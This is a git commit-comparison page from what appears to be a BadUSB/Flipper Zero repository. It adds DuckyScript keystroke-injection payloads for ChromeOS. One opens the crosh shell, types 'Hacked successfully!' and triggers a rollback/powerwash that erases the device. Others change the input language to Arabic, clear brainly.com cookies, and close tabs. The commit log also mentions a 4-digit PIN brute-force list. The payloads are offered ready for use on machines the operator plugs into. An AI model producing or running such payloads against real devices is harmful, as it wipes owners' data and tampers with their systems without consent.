Compare commits

...

16 Commits

Author SHA1 Message Date
UberGuidoZ
4430a1a22a Updated submodule 2023-07-04 23:00:30 -07:00
UberGuidoZ
c6cf3da239 Moved to BadUSB and fixed issues
- Removed spaces (can cause issues)
- Changed line ending to Unix (LF)
2023-07-04 22:29:02 -07:00
UberGuidoZ
6d82fb4a0d
Merge pull request #443 from Trippindoodles/patch-2
Create 265_4_Digit_Pin_BF.txt
2023-07-04 22:24:33 -07:00
UberGuidoZ
126a227921
Merge pull request #442 from httpsisbetter/main
Work in progress optimized chomreOS scripts
2023-07-04 22:18:35 -07:00
UberGuidoZ
444b208b67
Removed spaces (can cause issues) 2023-07-04 22:18:26 -07:00
UberGuidoZ
446aba6aff
Removed spaces (can cause issues) 2023-07-04 22:18:10 -07:00
UberGuidoZ
8a795678e4
Removed spaces (can cause issues) 2023-07-04 22:16:59 -07:00
UberGuidoZ
d3f99f3eae
Removed spaces (can cause issues) 2023-07-04 22:16:20 -07:00
UberGuidoZ
86c9266e50 Updated submodule 2023-07-04 21:00:29 -07:00
Trippindoodles
8409a77ac7
Create 265_4_Digit_Pin_BF.txt
Includes RF Bandit's top 65
2023-07-03 13:46:37 -04:00
httpsisbetter
44012a80e6
Merge branch 'UberGuidoZ:main' into main 2023-07-01 22:15:54 -07:00
httpsisbetter
a555a8fb49
Create ROLLBACKNEW.txt 2023-06-02 17:21:06 -07:00
httpsisbetter
4369bb5a77
Create closetestnew.txt 2023-06-02 16:59:15 -07:00
httpsisbetter
c994d72369
Create brainynew.txt 2023-06-02 16:51:04 -07:00
httpsisbetter
3391e89278
Update arabicnew.txt 2023-06-02 16:50:40 -07:00
httpsisbetter
27ae4cee3c
Create arabicnew.txt 2023-06-02 16:44:36 -07:00
7 changed files with 1151 additions and 2 deletions

File diff suppressed because it is too large Load Diff

@ -1 +1 @@
Subproject commit 70c312764f987e037e73c0a82eab7ecb63539241
Subproject commit 39e9e792942672b110d1078e6c202c8233087037

View File

@ -0,0 +1,29 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Will commit a update rollback/powerwash
REM Might not work with enterprise enrolled devices
REM Requirement: CHROMEOS
DEFAULTDELAY 100
CTRL W
REPEAT 2
DELAY 2000
TAB
TAB
TAB
ENTER
DELAY 1000
STRING chrome-untrusted://crosh
ENTER
DELAY 3000
STRING Hacked successfully!
ENTER
DELAY 2000
STRING cat > /dev/null << EOF
ENTER
DELAY 500
STRING rollback
DELAY 1000
ENTER
DELAY 1000
STRING Y
DELAY 500
ENTER

View File

@ -0,0 +1,36 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Changes language in settings to arabic ( It will still have the language input bar in the bottom )
REM Requirements: CHROMEOS
DEFAULTDELAY 100
CTRL W
REPEAT 2
TAB
ENTER
DELAY 500
STRING add input methods
DELAY 1000
ENTER
REM -----
DELAY 3000
ENTER
DELAY 700
STRING arabic
DELAY 500
ENTER
TAB
TAB
ENTER
TAB
TAB
ENTER
REM -----
DELAY 500
SHIFT TAB
DELAY 70
SHIFT TAB
DELAY 70
SHIFT TAB
DELAY 70
ENTER
CTRL W
REPEAT 2

View File

@ -0,0 +1,17 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Resets brainly.com cookies for you
REM CHROMEOS
DEFAULTDELAY 500
CTRL T
STRING chrome://settings/siteData
ENTER
DELAY 3000
TAB
DELAY 2000
STRING brainly
DELAY 1000
TAB
REPEAT 3
ENTER
DELAY 1000
CTRL W

View File

@ -0,0 +1,6 @@
REM MADE BY HTTPS / https://github.com/httpsisbetter
REM Closes all tabs ( Change the amount of CTRL W you want the more the ctrl W the more tabs it closes )
REM ChromeB
DEFAULTDELAY 100
CTRL W
REPEAT 2

@ -1 +1 @@
Subproject commit c2e44df7f2b4e45926bc1ea79301cc9f7b42030f
Subproject commit 5837453bde527c91b74c548db0159426bd68e2ad